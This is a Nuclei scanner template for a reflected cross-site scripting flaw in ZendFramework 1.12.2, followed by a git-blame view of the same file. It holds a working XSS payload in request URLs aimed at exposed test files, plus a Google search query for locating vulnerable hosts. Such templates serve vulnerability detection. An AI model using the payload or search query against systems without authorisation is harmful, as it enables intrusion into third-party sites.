nuclei-templates/http/vulnerabilities/zend/zend-v1-xss.yaml

id: zend-v1-xss

info:
  name: ZendFramework 1.12.2 - Cross-Site Scripting
  author: c3l3si4n
  severity: medium
  description: |
    ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
  reference:
    - https://twitter.com/c3l3si4n/status/1600035722148212737
  metadata:
    verified: true
    max-request: 2
    google-query: inurl:"/tests/Zend/Http/"
  tags: zend,zendframework,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
      - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"redirection"]'
          - '"param"'
          - '<img/src=x onerror=alert(document.domain)'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a004730450221009b3af7535c942d939a7463c5c3332c3d96b8b6c37337c0b3c19f2e328ccb7a51022031b67302f23c6c4dbc39c125ff2e43c087440dd55f91bb9a68636fe1ca3a54b3:922c64590222798bb761d5b6d8e72950
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`id: zend-v1-xss`

			`info:`
			`name: ZendFramework 1.12.2 - Cross-Site Scripting`
			`author: c3l3si4n`
			`severity: medium`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`description: \|`
			`ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`reference:`
			`- https://twitter.com/c3l3si4n/status/1600035722148212737`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
Dashboard Content Enhancements (#6598) Dashboard Content Enhancements 2023-01-23 22:14:23 +00:00			`google-query: inurl:"/tests/Zend/Http/"`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`tags: zend,zendframework,xss`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`- method: GET`
			`path:`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`- "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"`
			`- "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`stop-at-first-match: true`
templateman update 2023-10-14 11:27:55 +00:00
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
Update zend-v1-xss.yaml 2022-12-07 12:53:56 +00:00			`- '"redirection"]'`
			`- '"param"'`
			`- '<img/src=x onerror=alert(document.domain)'`
added XSS for ZendFramework1 2022-12-06 08:13:46 +00:00			`condition: and`

			`- type: word`
			`part: header`
			`words:`
Update zend-v1-xss.yaml 2022-12-07 13:52:26 +00:00			`- text/html`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a004730450221009b3af7535c942d939a7463c5c3332c3d96b8b6c37337c0b3c19f2e328ccb7a51022031b67302f23c6c4dbc39c125ff2e43c087440dd55f91bb9a68636fe1ca3a54b3:922c64590222798bb761d5b6d8e72950`